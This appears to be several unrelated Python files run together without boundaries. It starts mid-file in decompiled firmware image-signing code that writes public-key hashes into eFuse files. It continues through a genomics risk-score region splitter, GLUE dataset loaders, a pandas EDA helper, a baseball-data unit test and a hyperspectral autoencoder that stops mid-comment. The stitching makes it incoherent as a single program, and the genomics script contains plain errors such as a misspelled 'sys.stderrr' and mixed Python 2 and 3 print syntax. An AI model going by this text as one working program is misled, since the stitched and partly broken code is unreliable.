img_update_efuse_fun(sign, pk_hash, encrypt, None, key_sel, None) else: bflb_utils.printf('Write if img') whole_img_file_name = cfg.get(cfg_section, 'whole_img_file') fp = open_file(whole_img_file_name, 'wb+') img_data = bootheader_data + pk_data + pk_data + signature + signature + aesiv_data + fw_data fp.write(img_data) fp.close() if encrypt != 0: img_update_efuse_fun(sign, pk_hash, 1, None, key_sel, encrypt_key + bytearray(32 - len(encrypt_key))) else: img_update_efuse_fun(sign, pk_hash, 0, None, key_sel, bytearray(32)) return ( 'OK', data_tohash) def bind_if_img(img_dir_path): fp = open_file(cfg.get('Img_CPU0_Cfg', 'whole_img_file'), 'rb') read_data = fp.read() fp.close() fp = open_file(cfg.get('Img_CPU1_Cfg', 'whole_img_file'), 'rb') read_data = read_data + fp.read() fp.close() fp = open_file(img_dir_path + '/wholeimg_cpu0_cpu1_if.bin', 'wb+') fp.write(read_data) fp.close() def usage(): bflb_utils.printf(sys.argv[0], '\n') bflb_utils.printf('-c/--cpu= :CPU type: cpu0 cpu1 or all') bflb_utils.printf('-i/--img_type= :image type:media or if') bflb_utils.printf('-s/--signer= :(the other)signer:cpu0 or cpu1') bflb_utils.printf('-h/--help :helper') def sign_process(data_tohash, file, privatekey_file_uecc, publickey_file, signer): fp = open_file(file, 'rb') header = bytearray(fp.read()) header = header + bytearray(0) fp.close() pk_data, pk_hash, signature_field = img_create_sign_data(data_tohash, privatekey_file_uecc, publickey_file) pk_data = pk_data + bflb_utils.get_crc32_bytearray(pk_data) pk_pos = 244 header[pk_pos:pk_pos + 64 + 4] = pk_data sign_pos = 384 header[sign_pos:sign_pos + 4 + 64 + 4] = signature_field fp = open_file(file, 'wb+') fp.write(header) fp.close() mask_4bytes = bytearray.fromhex('FFFFFFFF') if signer == 'cpu0': bflb_utils.printf("CPU0 is signer, add signature for CPU1's image") fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_file'), 'rb') efuse_data = bytearray(fp.read()) + bytearray(0) fp.close() fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_mask_file'), 'rb') efuse_mask_data = bytearray(fp.read()) + bytearray(0) fp.close() efuse_data[keyslot0:keyslot2] = pk_hash efuse_mask_data[keyslot0:keyslot2] = mask_4bytes * 8 fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_file'), 'wb+') fp.write(efuse_data) fp.close() fp = open_file(cfg.get('Img_CPU0_Cfg', 'efuse_mask_file'), 'wb+') fp.write(efuse_mask_data) fp.close() else: bflb_utils.printf("CPU1 is signer, add signature for CPU0's image") fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_file'), 'rb') efuse_data = bytearray(fp.read()) + bytearray(0) fp.close() fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_mask_file'), 'rb') efuse_mask_data = bytearray(fp.read()) + bytearray(0) fp.close() efuse_data[keyslot5:keyslot5 + 16] = pk_hash[0:16] efuse_mask_data[keyslot5:keyslot5 + 16] = mask_4bytes * 4 efuse_data[keyslot6:keyslot7] = pk_hash[16:32] efuse_mask_data[keyslot6:keyslot7] = mask_4bytes * 4 fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_file'), 'wb+') fp.write(efuse_data) fp.close() fp = open_file(cfg.get('Img_CPU1_Cfg', 'efuse_mask_file'), 'wb+') fp.write(efuse_mask_data) fp.close() def img_create_do(options, img_dir_path=None, config_file=None): bflb_utils.printf('========= image create =========') bflb_utils.printf('Image create path: ', img_dir_path) if config_file == None: config_file = img_dir_path + '/img_create_cfg.ini' cfg.read(config_file) bflb_utils.printf('Config file: ', config_file) cpu_type = '' signer = 'none' ret0 = 'OK' ret1 = 'OK' data_tohash_cpu0 = bytearray(0) data_tohash_cpu1 = bytearray(0) try: opts, args = getopt.getopt(options, 'c:i:s:Hh', ['cpu=', 'img_type=', 'signer=', 'help']) for option, value in opts: if option in ('-h', '-H'): usage() else: if option in ('-c', '--cpu'): cpu_type = value if option in ('-i', '--img_type'): img_type = value if option in ('-s', '--signer'): signer = value except getopt.GetoptError as err: try: bflb_utils.printf(err) usage() finally: err = None del err if img_type == 'media': flash_img = 1 else: flash_img = 0 if cpu_type == 'cpu0': ret0, data_tohash_cpu0 = img_creat_process('cpu0', flash_img) elif cpu_type == 'cpu1': ret1, data_tohash_cpu1 = img_creat_process('cpu1', flash_img) elif cpu_type == 'all': ret0, data_tohash_cpu0 = img_creat_process('cpu0', flash_img) ret1, data_tohash_cpu1 = img_creat_process('cpu1', flash_img) else: img_creat_process('', flash_img) return if ret0 == 'OK' and ret1 == 'OK': if signer == 'cpu0': bflb_utils.printf('cpu0 sign cpu1 ') if flash_img == 1: sign_process(data_tohash_cpu1, cfg.get('Img_CPU1_Cfg', 'bootinfo_file'), cfg.get('Img_CPU0_Cfg', 'privatekey_file_uecc'), cfg.get('Img_CPU0_Cfg', 'publickey_file'), 'cpu0') else: sign_process(data_tohash_cpu1, cfg.get('Img_CPU1_Cfg', 'whole_img_file'), cfg.get('Img_CPU0_Cfg', 'privatekey_file_uecc'), cfg.get('Img_CPU0_Cfg', 'publickey_file'), 'cpu0') elif signer == 'cpu1': bflb_utils.printf('cpu1 sign cpu0 ') if flash_img == 1: sign_process(data_tohash_cpu0, cfg.get('Img_CPU0_Cfg', 'bootinfo_file'), cfg.get('Img_CPU1_Cfg', 'privatekey_file_uecc'), cfg.get('Img_CPU1_Cfg', 'publickey_file'), 'cpu1') else: sign_process(data_tohash_cpu0, cfg.get('Img_CPU0_Cfg', 'whole_img_file'), cfg.get('Img_CPU1_Cfg', 'privatekey_file_uecc'), cfg.get('Img_CPU1_Cfg', 'publickey_file'), 'cpu1') else: bflb_utils.printf('Fail to create images!') return if cpu_type == 'all': if flash_img == 0: bind_if_img(img_dir_path) def create_sp_media_image(config, cpu_type=None): global cfg bflb_utils.printf('========= sp image create =========') cfg = bflb_utils.BFConfigParser() cfg.read(config) img_creat_process('cpu0', 1) # okay decompiling lib.bl60x.img_create_do.pyc #!/usr/bin/env python #=============================================================================== # Copyright (c) 2019 # Revised from calculate_risk_scores.py from Dr. # Lab of Dr. and Dr. # University of Michigan #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in all #copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE #SOFTWARE. #============================================================================== ############################ ##### IMPORT MODULES ####### ########################### from __future__ import division import argparse import subprocess import gzip import io import numpy as np from glob import glob import sys from tempfile import NamedTemporaryFile import math from collections import OrderedDict from collections import Counter import os import multiprocessing as mp #import pysam from functools import partial import time import signal import datetime now = datetime.datetime.now() print ("Current date and time : ") print (now.strftime("%Y-%m-%d %H:%M:%S")) print(sys.version) for module in sys.modules: try: print(module,sys.modules[module].__version__) except: pass #This python script can be used to process weights files into region .bed files for tabix # Takes a fairly generalized weights file # - Format your weight file as chr:pos, effect allele, weight OR provide 0-based column numbers for chr, pos, chr:pos, effect allele, weight # - Provide number of lines that have ## or text header to ignore when reading in file ########################### ##### PARSE ARGUMENTS #### ########################### def get_settings(): parser = argparse.ArgumentParser(description='Enter files to use for PRS calculation') parser.add_argument('-w', '--weight_file',help="Must be sorted by position. Columns and headers are customizable with arguments. Genom wide") parser.add_argument("-f",'--chunk_file',default="/net/dumbo/home/larsf/UKB500/VCF/Chunks_250k.txt",help="File with relevant information about chunked VCFs so we can make weight files and region files corresponding to the chunked VCFs. First 3 columns must be chr, start, end.") parser.add_argument("-xc","--prefix_col",help="0-based column with prefix for the chunk from the --chunk_file",default=7) parser.add_argument("-cc","--chrom_col",help="0-based column with chromosome in file",type=int) parser.add_argument("-pc","--pos_col",help="0-based column with end position of variant in weight file",type=int) parser.add_argument("-dc","--coord_col",help="0-based column with chromosome:position:ref:alt of variant in weight file", type=int) parser.add_argument("-ec","--ea_col",help="0-based column with effect allele in weight file",type=int,default=1) parser.add_argument("-rc","--ref_col",help="0-based column with reference allele in weight file",type=int) parser.add_argument("-ac","--alt_col",help="0-based column with alternate allele in weight file",type=int) parser.add_argument("-wc","--weight_col",help="0-based column with weight",type=int,default=2) parser.add_argument("-l","--header_lines",help="Number of header lines in weight file to skip",type=int) parser.add_argument("-n","--num_chunk",help="Number of markers from weight file to run at a time",default=1000,type=int) parser.add_argument('-o', '--output_prefix',type=str,default="results") parser.add_argument("--split",help="split path",type=str,default="/usr/bin/split") args=parser.parse_args() ## check if marker information is adequately provided if args.coord_col is None: #no coordinate offered check_list=[] coordinate_columns=[args.chrom_col,args.pos_col,args.ref_col,args.alt_col] for f in coordinate_columns: check_list.append(f!=None) #how many are empty if sum(check_list)==0: sys.exit("Need coordinate column for chr:pos:ref:alt or each of these pieces of information individually\n") elif sum(check_list)!=4: sys.exit("Need ALL four columns for chromosome, position, reference, alternate\n") print >> sys.stderr, "%s\n" % args return args ############################### ######## FUNCTIONS ######### ############################### #open files def open_zip(f): if f is None: print >> sys.stderr, "File was not given as parameter\n" elif ".gz" in f: command=gzip.open(f,"rt") print >> sys.stderrr, "Opening gzipped file %s\n" % f elif f == "-": command=sys.stdin() else: command=open(f,"rt") print >> sys.stderr, "Opening file %s\n" % f return command def read_weights(weight_file,chrom,pos,ref,alt,coord,ea,weight,header_lines): """ Read file with weights into dictionary. """ weight_dict=OrderedDict() command=open_zip(weight_file) counter=0 with command as f: for line in f: counter+=1 if (header_lines is not None and counter > header_lines) or (header_lines is None and line[0]!="#"): #handle header ls=line.rstrip() lineList=ls.split() #assumes whitespace delimiter, space or tab if chrom is not None: #because of argument check function we can trust this means we are making our own coordinate with chrom, pos, ref, al1t coordinate=":".join([str(lineList[chrom]),str(lineList[pos]),str(lineList[ref]),str(lineList[alt])]) weight_dict[coordinate]=lineList elif coord is not None: if len(lineList[coord].split(":"))!=4: sys.exit("Coordinate must have 4 components chr:pos:ref:alt\n") weight_dict[lineList[coord]]=(lineList[ea],float(lineList[weight])) else: #earlier checks mean we should never hit this sys.exit("Error1\n") return weight_dict def read_chunks(chunk_file,prefix_col): """Read in chunk file""" chunk_list=[] command=open_zip(chunk_file) with command as f: for line in f: ls=line.rstrip() if ls[0].isdigit(): #assumes we ignore header lines not starting with a digit, also ignores sex chrom lineList=ls.split() #assumes whitespace delimiter, space or tab chunk_list.append(":".join([lineList[0],lineList[1],lineList[2],lineList[prefix_col]])) #chr:start:end:prefix return(chunk_list) def make_regions(weight_dict,chunk_list,output_prefix,num_chunk): """ Make a region files using weights and known chunks """ total=len(weight_dict.keys()) print(weight_dict.keys()) if total==0: sys.stderr.write("Weights file is empty\n") sys.exit() #open config file config="_".join([output_prefix,"config.txt"]) cfile=open(config,'w+') for j in range(len(chunk_list)): mega_chunk=chunk_list[j] chunk_chrom,chunk_start,chunk_end,prefix=mega_chunk.split(":") vcf="".join(["/net/dumbo/home/larsf/UKB500/VCF/ukb24460_imp_",prefix,"_v3_s486743.vcf.gz"]) #need to generalize mini_chunk_counter=0 region="_".join([output_prefix,prefix,".".join([str(mini_chunk_counter),"regions.txt"])]) #new region weight="_".join([output_prefix,prefix,".".join([str(mini_chunk_counter),"weights.txt"])]) #new weight cfile.write("\t".join([region,weight,vcf,chunk_chrom])+"\n") #write in config rfile=open(region,'w') wfile=open(weight,'w') marker_counter=0 for entry in weight_dict.keys(): #this is an ordered dictionary print(marker_counter) print(mini_chunk_counter) print(entry,chunk_chrom,chunk_start,chunk_end) chrom,pos,a1,a2=entry.split(":") if int(chrom)==int(chunk_chrom) and int(pos)>=int(chunk_start) and int(pos)<=int(chunk_end): #still in mega chunk rfile.write("\t".join([chrom,pos]) + "\n") wfile.write("\t".join(weight_dict[entry]) + "\n") print("Write %s" % entry) del weight_dict[entry] #delete from dictionary marker_counter+=1 if marker_counter==num_chunk+1: #end of a mini chunk, start new region and write files within the same mega_chunk rfile.close() wfile.close() marker_counter=0 mini_chunk_counter+=1 break elif (int(chrom)!=int(chunk_chrom) or int(pos) > int(chunk_end)) or marker_counter==total: #end of mega chunk print("%s not in %s" % (entry,mega_chunk)) j+=1 break cfile.close() clean_up(config) return 0 def clean_up(config): print("Clean up directory\n") keep=[] command=open_zip(config) with command as f: for line in f: ls=line.rstrip() lineList=ls.split() if os.stat(lineList[0]).st_size==0 | os.stat(lineList[1]).st_size==0: os.remove(lineList[0]) os.remove(lineList[1]) else: keep.append(line) f.close() os.remove(config) cfile=open(config,'w+') print("Writing new config\n") for entry in keep: cfile.write(entry) cfile.close() ######################### ########## MAIN ######### ######################### def main(): #get arguments args=get_settings() print >> sys.stderr, "Not generalized yet. The VCF path printing to config file is hardcoded\n" #create dictionary of weights per variant weight_dict=read_weights(args.weight_file,args.chrom_col,args.pos_col,args.ref_col,args.alt_col,args.coord_col,args.ea_col,args.weight_col,args.header_lines) #chr start end N chunk bgen sample prefi chunk_list=read_chunks(args.chunk_file,args.prefix_col) #write regions and config file make_regions(weight_dict,chunk_list,args.output_prefix,args.num_chunk) ##### Call main if __name__ == "__main__": main() riteshkumarumassedu/BERT-with-SOP import torch from torch.utils.data import Dataset, DataLoader import itertools import csv class data_parser(Dataset): """ Dataset Class to read data from the CSV file """ labels = None def __init__(self, file, pipeline=[]): Dataset.__init__(self) data = [] with open(file, "r") as f: lines = csv.reader(f, delimiter='\t', quotechar=None) for instance in self.get_instances(lines): for proc in pipeline: instance = proc(instance) data.append(instance) self.tensors = [torch.tensor(x, dtype=torch.long) for x in zip(*data)] def __len__(self): return self.tensors[0].size(0) def __getitem__(self, index): return tuple(tensor[index] for tensor in self.tensors) def get_instances(self, lines): """ get instance array from (csv-separated) line list """ raise NotImplementedError class load_MRPC_data(data_parser): """ Dataset class for MRPC """ labels = ("0", "1") # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[0], line[3], line[4] # label, text_a, text_b class load_MNLI_data(data_parser): """ Dataset class for MNLI """ labels = ("contradiction", "entailment", "neutral") # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[-1], line[8], line[9] # label, text_a, text_b class load_STSB_data(data_parser): """ Dataset Class for STSB""" labels = (None) # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[-1], line[7], line[8] # label, text_a, text_b class load_QQP_data(data_parser): """ Dataset class for QQP""" labels = ("0", "1") # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[5], line[3], line[4] # label, text_a, text_b class load_QNLI_data(data_parser): """ Dataset class for QQP""" labels = ("entailment", "not_entailment") # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[-1], line[1], line[2] # label, text_a, text_b class load_RTE_data(data_parser): """ Dataset class for RTE""" labels = ("entailment", "not_entailment") # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[-1], line[1], line[2] # label, text_a, text_b class load_WNLI_data(data_parser): """ Dataset class for WNLI""" labels = ("0", "1") # label names def __init__(self, file, pipeline=[]): super().__init__(file, pipeline) def get_instances(self, lines): for line in itertools.islice(lines, 1, None): # skip header yield line[-1], line[1], line[2] # label, text_a, text_b def dataset_to_class_mapping(task): """ Mapping from task string to Dataset Class """ table = {'mrpc': load_MRPC_data, 'mnli': load_MNLI_data, 'wnli':load_WNLI_data, 'rte':load_RTE_data, 'qnli':load_QNLI_data, 'qqp':load_QQP_data, 'stsb':load_STSB_data} return table[task] import pandas_profiling import pandas as pd import matplotlib import matplotlib.pyplot as plt import seaborn as sns import numpy as np import warnings from scipy import stats from scipy.stats import norm import os warnings.filterwarnings("ignore") def create_summary_report(df,name = None): # Data profiling/EDA profile = pandas_profiling.ProfileReport( df, title="Data Audit Report \nAuthor: {}".format(name) ) if not os.path.exists('./reports/data_audit_report.html'): os.makedirs('reports') profile.to_file(output_file="./reports/data_audit_report.html") def check_missing_data(df): flag=df.isna().sum().any() if flag==True: total = df.isnull().sum() percent = (df.isnull().sum()*100)/(df.isnull().count()) output = pd.concat([total, percent], axis=1, keys=['Total', 'Percent']) data_type = [] # written by Ved for col in df.columns: dtype = str(df[col].dtype) data_type.append(dtype) output['Types'] = data_type return(np.transpose(output)) else: return(False) def reduce_mem_usage(df, verbose=True): numerics = ["int16", "int32", "int64", "float16", "float32", "float64"] start_mem = df.memory_usage(deep=True).sum() / 1024 ** 2 for col in df.columns: col_type = df[col].dtypes if col_type in numerics: c_min = df[col].min() c_max = df[col].max() if str(col_type)[:3] == "int": if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max: df[col] = df[col].astype(np.int8) elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max: df[col] = df[col].astype(np.int16) elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max: df[col] = df[col].astype(np.int32) elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max: df[col] = df[col].astype(np.int64) else: if ( c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max ): df[col] = df[col].astype(np.float16) elif ( c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max ): df[col] = df[col].astype(np.float32) else: df[col] = df[col].astype(np.float64) end_mem = df.memory_usage(deep=True).sum() / 1024 ** 2 if verbose: print( "Mem. usage decreased to {:5.2f} Mb ({:.1f}% reduction)".format( end_mem, 100 * (start_mem - end_mem) / start_mem ) ) return df def gen_eda(data_frame): print("##########----------##########") print(f"Dataset has {data_frame.shape[0]} rows and {data_frame.shape[1]} columns.") print("##########----------##########") print( f"There are {data_frame.isnull().any().sum()} columns in the dataset with missing values." ) print("##########----------##########") one_value_cols = [ col for col in data_frame.columns if data_frame[col].nunique() <= 1 ] print( f"There are {len(one_value_cols)} columns in the dataset with one unique value." ) print("##########----------##########") dtype_df = data_frame.dtypes.reset_index() dtype_df.columns = ["Count", "Column Type"] print(dtype_df) print("##########----------##########") df1 = dtype_df.groupby("Column Type").aggregate("count").reset_index() print(df1) print("##########----------##########") # Number of unique classes in each object column df2 = data_frame.select_dtypes("object").apply(pd.Series.nunique, axis=0) print(df2) def general_stats(data_frame): stats = [] for col in data_frame.columns: stats.append( ( col, data_frame[col].nunique(), data_frame[col].isnull().sum() * 100 / data_frame.shape[0], data_frame[col].value_counts(normalize=True, dropna=False).values[0] * 100, data_frame[col].dtype, ) ) stats_df = pd.DataFrame( stats, columns=[ "Feature", "Unique_values", "Percentage of missing values", "Percentage of values in the biggest category", "type", ], ) stats_df.sort_values("Percentage of missing values", ascending=False) print(stats_df) def find_correlations(data_frame, dependent): # Find correlations with the target and sort correlations = data_frame.corr()[dependent].sort_values() # Display correlations print("Most Positive Correlations:\n", correlations.tail(15)) print("\nMost Negative Correlations:\n", correlations.head(15)) def missing_values_table(df): # Total missing values mis_val = df.isnull().sum() # Percentage of missing values mis_val_percent = 100 * df.isnull().sum() / len(df) # Make a table with the results mis_val_table = pd.concat([mis_val, mis_val_percent], axis=1) # Rename the columns mis_val_table_ren_columns = mis_val_table.rename( columns={0: "Missing Values", 1: "% of Total Values"} ) # Sort the table by percentage of missing descending mis_val_table_ren_columns = ( mis_val_table_ren_columns[mis_val_table_ren_columns.iloc[:, 1] != 0] .sort_values("% of Total Values", ascending=False) .round(1) ) # Print some summary information print( "Your selected dataframe has " + str(df.shape[1]) + " columns.\n" "There are " + str(mis_val_table_ren_columns.shape[0]) + " columns that have missing values." ) # Return the dataframe with missing information return mis_val_table_ren_columns def print_quantiles(data_frame, column): data_frame[column] = data_frame[column].astype(float) print(f"{column} Quantiles:") print( data_frame[column].quantile( [0.0, 0.01, 0.025, 0.1, 0.25, 0.5, 0.75, 0.9, 0.95, 0.975, 0.99, 1.0] ) ) def time_series_plot(df): """Given dataframe, generate times series plot of numeric data by daily, monthly and yearly frequency""" print( "\nTo check time series of numeric data by daily, monthly and yearly frequency" ) if len(df.select_dtypes(include="datetime64").columns) > 0: for col in df.select_dtypes(include="datetime64").columns: for p in ["D", "M", "Y"]: if p == "D": print("Plotting daily data") elif p == "M": print("Plotting monthly data") else: print("Plotting yearly data") for col_num in df.select_dtypes(include=np.number).columns: __ = df.copy() __ = __.set_index(col) __T = __.resample(p).sum() ax = __T[[col_num]].plot() ax.set_ylim(bottom=0) ax.get_yaxis().set_major_formatter( matplotlib.ticker.FuncFormatter( lambda x, p: format(int(x), ",") ) ) plt.show() def numeric_eda(df, hue=None): """Given dataframe, generate EDA of numeric data""" print("\nTo check: \nDistribution of numeric data") pd.display(df.describe().T) columns = df.select_dtypes(include=np.number).columns figure = plt.figure(figsize=(20, 10)) figure.add_subplot(1, len(columns), 1) for index, col in enumerate(columns): if index > 0: figure.add_subplot(1, len(columns), index + 1) sns.boxplot(y=col, data=df, boxprops={"facecolor": "None"}) figure.tight_layout() plt.show() if len(df.select_dtypes(include="category").columns) > 0: for col_num in df.select_dtypes(include=np.number).columns: for col in df.select_dtypes(include="category").columns: fig = sns.catplot( x=col, y=col_num, kind="violin", data=df, height=5, aspect=2 ) fig.set_xticklabels(rotation=90) plt.show() # Plot the pairwise joint distributions print("\nTo check pairwise joint distribution of numeric data") if hue == None: sns.pairplot(df.select_dtypes(include=np.number)) else: sns.pairplot(df.select_dtypes(include=np.number).join(df[[hue]]), hue=hue) plt.show() def top5(df): """Given dataframe, generate top 5 unique values for non-numeric data""" columns = df.select_dtypes(include=["object", "category"]).columns for col in columns: print("Top 5 unique values of " + col) print( df[col] .value_counts() .reset_index() .rename(columns={"index": col, col: "Count"})[ : min(5, len(df[col].value_counts())) ] ) print(" ") def categorical_eda(df, hue=None): """Given dataframe, generate EDA of categorical data""" print("\nTo check: \nUnique count of non-numeric data\n") print(df.select_dtypes(include=["object", "category"]).nunique()) top5(df) # Plot count distribution of categorical data for col in df.select_dtypes(include="category").columns: fig = sns.catplot(x=col, kind="count", data=df, hue=hue) fig.set_xticklabels(rotation=90) plt.show() if __name__ == "__main__": df = pd.read_csv("../input/train_house_price.csv") # gen_eda(df) # general_stats(df) # find_correlations(df, 'SalePrice') missing_values_table(df) #!/usr/bin/env python import unittest import mlbgame class TestEvents(unittest.TestCase): def test_game_events(self): events = mlbgame.game_events('2016_08_02_nyamlb_nynmlb_1') for inning in events: self.assertIsInstance(inning.num, int) if inning.num == 1: i = inning self.assertIsInstance(inning.top, list) self.assertIsInstance(inning.bottom, list) atbats = inning.top + inning.bottom for atbat in atbats: if inning.num == 1 and atbat.num == 1: ab = atbat self.assertIsInstance(atbat.away_team_runs, int) self.assertIsInstance(atbat.b, int) self.assertIsInstance(atbat.b1, (int, str)) self.assertIsInstance(atbat.b2, (int, str)) self.assertIsInstance(atbat.b3, (int, str)) self.assertIsInstance(atbat.batter, int) self.assertIsInstance(atbat.des, str) try: self.assertIsInstance(atbat.des_es, (unicode, str)) except NameError: self.assertIsInstance(atbat.des_es, str) self.assertIsInstance(atbat.event, str) try: self.assertIsInstance(atbat.event_es, (unicode, str)) except NameError: self.assertIsInstance(atbat.event_es, str) self.assertIsInstance(atbat.event_num, int) self.assertIsInstance(atbat.home_team_runs, int) self.assertIsInstance(atbat.num, int) self.assertIsInstance(atbat.o, int) self.assertIsInstance(atbat.pitcher, int) self.assertIsInstance(atbat.pitches, list) self.assertIsInstance(atbat.play_guid, str) self.assertIsInstance(atbat.s, int) self.assertIsInstance(atbat.start_tfs, int) self.assertIsInstance(atbat.start_tfs_zulu, str) for pitch in atbat.pitches: self.assertIsInstance(pitch.des, str) try: self.assertIsInstance(pitch.des_es, (unicode, str)) except NameError: self.assertIsInstance(pitch.des_es, str) self.assertIsInstance(pitch.pitch_type, str) self.assertIsInstance(pitch.start_speed, float) self.assertIsInstance(pitch.sv_id, (str, int)) self.assertIsInstance(pitch.type, str) inning = i self.assertEqual(inning.num, 1) self.assertEqual(inning.__str__(), 'Inning 1') atbat = ab self.assertEqual(atbat.away_team_runs, 0) self.assertEqual(atbat.b, 1) self.assertEqual(atbat.b1, '') self.assertEqual(atbat.b2, '') self.assertEqual(atbat.b3, '') self.assertEqual(atbat.batter, 458731) self.assertEqual(atbat.des, ' flies out to center fielder Ale. ') self.assertEqual(atbat.des_es, ' batea elevado de out a jardinero central . ') self.assertEqual(atbat.event, 'Flyout') self.assertEqual(atbat.event_es, 'Elevado de Out') self.assertEqual(atbat.event_num, 6) self.assertEqual(atbat.home_team_runs, 0) self.assertEqual(atbat.num, 1) self.assertEqual(atbat.o, 1) self.assertEqual(atbat.pitcher, 594798) self.assertEqual(atbat.play_guid, 'e91fe0bf-6e1e-40a3-953c-47a943b37638') self.assertEqual(atbat.s, 0) self.assertEqual(atbat.start_tfs, 231105) self.assertEqual(atbat.start_tfs_zulu, '2016-08-02T23:11:05Z') self.assertEqual(atbat.__str__(), ' flies out to center fielder . ') pitch = atbat.pitches[0] self.assertEqual(pitch.des, 'Ball') self.assertEqual(pitch.des_es, 'Bola mala') self.assertEqual(pitch.pitch_type, 'FT') self.assertEqual(pitch.start_speed, 95.2) self.assertEqual(pitch.type, 'B') self.assertEqual(pitch.__str__(), 'Pitch: FT at 95.2: Ball') def test_game_events_empty(self): self.assertRaises(ValueError, lambda: mlbgame.game_events('game_id')) self.assertRaises(ValueError, lambda: mlbgame.game_events('2016_08_02_nymlb_nymlb_1')) _sadm/listen/webhook/__init__.py # Copyright (c) <> # See LICENSE file. from . import handlers __all__ = [] """ ======================================================================= General Information ------------------- Codename: DeepCASSI (ACM SIGGRAPH Asia 2017) Writers: (), (), (), () Institute: KAIST Visual Computing Laboratory For information please see the paper: High-Quality Hyperspectral Reconstruction Using a Spectral Prior ACM SIGGRAPH ASIA 2017, , , , , Visit our project http://vclab.kaist.ac.kr/siggraphasia2017p1/ for the hyperspectral image dataset. Please cite this paper if you use this code in an academic publication. Bibtex: @Article{DeepCASSI:SIGA:2017, author = { and and and and }, title = {High-Quality Hyperspectral Reconstruction Using a Spectral Prior}, journal = {ACM Transactions on Graphics (Proc. SIGGRAPH Asia 2017)}, year = {2017}, volume = {36}, number = {6}, pages = {218:1-13}, doi = "10.1145/3130800.3130810", url = "http://dx.doi.org/10.1145/3130800.3130810", } ========================================================================== License Information ------------------- , , , have developed this software and related documentation (the "Software"); confidential use in source form of the Software, without modification, is permitted provided that the following conditions are met: Neither the name of the copyright holder nor the names of any contributors may be used to endorse or promote products derived from the Software without specific prior written permission. The use of the software is for Non-Commercial Purposes only. As used in this Agreement, "Non-Commercial Purpose" means for the purpose of education or research in a non-commercial organisation only. "Non-Commercial Purpose" excludes, without limitation, any use of the Software for, as part of, or in any way in connection with a product (including software) or service which is sold, offered for sale, licensed, leased, published, loaned or rented. If you require a license for a use excluded by this agreement, please email []. License: GNU General Public License Usage Alternatively, this file may be used under the terms of the GNU General Public License version 3.0 as published by the Free Software Foundation and appearing in the file LICENSE.GPL included in the packaging of this file. Please review the following information to ensure the GNU General Public License version 3.0 requirements will be met: http://www.gnu.org/copyleft/gpl.html. Warranty: KAIST-VCLAB MAKES NO REPRESENTATIONS OR WARRANTIES ABOUT THE SUITABILITY OF THE SOFTWARE, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR NON-INFRINGEMENT. KAIST-VCLAB SHALL NOT BE LIABLE FOR ANY DAMAGES SUFFERED BY LICENSEE AS A RESULT OF USING, MODIFYING OR DISTRIBUTING THIS SOFTWARE OR ITS DERIVATIVES. ======================================================================= """ import tensorflow as tf import params # 'c': convolutional default_n_features_encoder = [params.N_VALID_SPECTRALS, 64, 64, 64, 64, 64, 64] default_layer_type_encoder = ['c', 'c', 'c', 'c', 'c', 'c'] default_n_features_decoder = default_n_features_encoder[::-1] default_layer_type_decoder = ['c', 'c', 'c', 'c', 'c', 'c'] def build_convoultiona_ae(list_n_features_encoder=default_n_features_encoder, list_layer_type_encoder=default_layer_type_encoder, list_n_features_decoder=default_n_features_decoder, list_layer_type_decoder= default_layer_type_decoder, is_trainable=True, with_wd=True ): ######################################################### # Check dimensions ######################################################### if list_n_features_encoder[-1] != list_n_features_decoder[0]: print('The output side of the encoder' \ ' and the input size of decoder do not match') exit() if list_n_features_encoder[0] != list_n_features_decoder[-1]: print('The input side of the encoder' \ ' and the output size of decoder do not match') exit() if (list_n_features_encoder[0] != params.N_VALID_SPECTRALS)\ or(list_n_features_decoder[-1] != params.N_VALID_SPECTRALS): print('The input and the output sizes do not match with the n_channels') exit() if (len(list_n_features_encoder) != len(list_layer_type_encoder) + 1) \ or (len(list_n_features_decoder) != len(list_layer_type_decoder) + 1): print('The input and the output sizes do not match with the n_channels') exit() n_convs_encoder = len(list_layer_type_encoder) n_convs_decoder = len(list_layer_type_decoder) ######################################################### # Set placeholders ######################################################### # the shape should be (batchsize, psize, 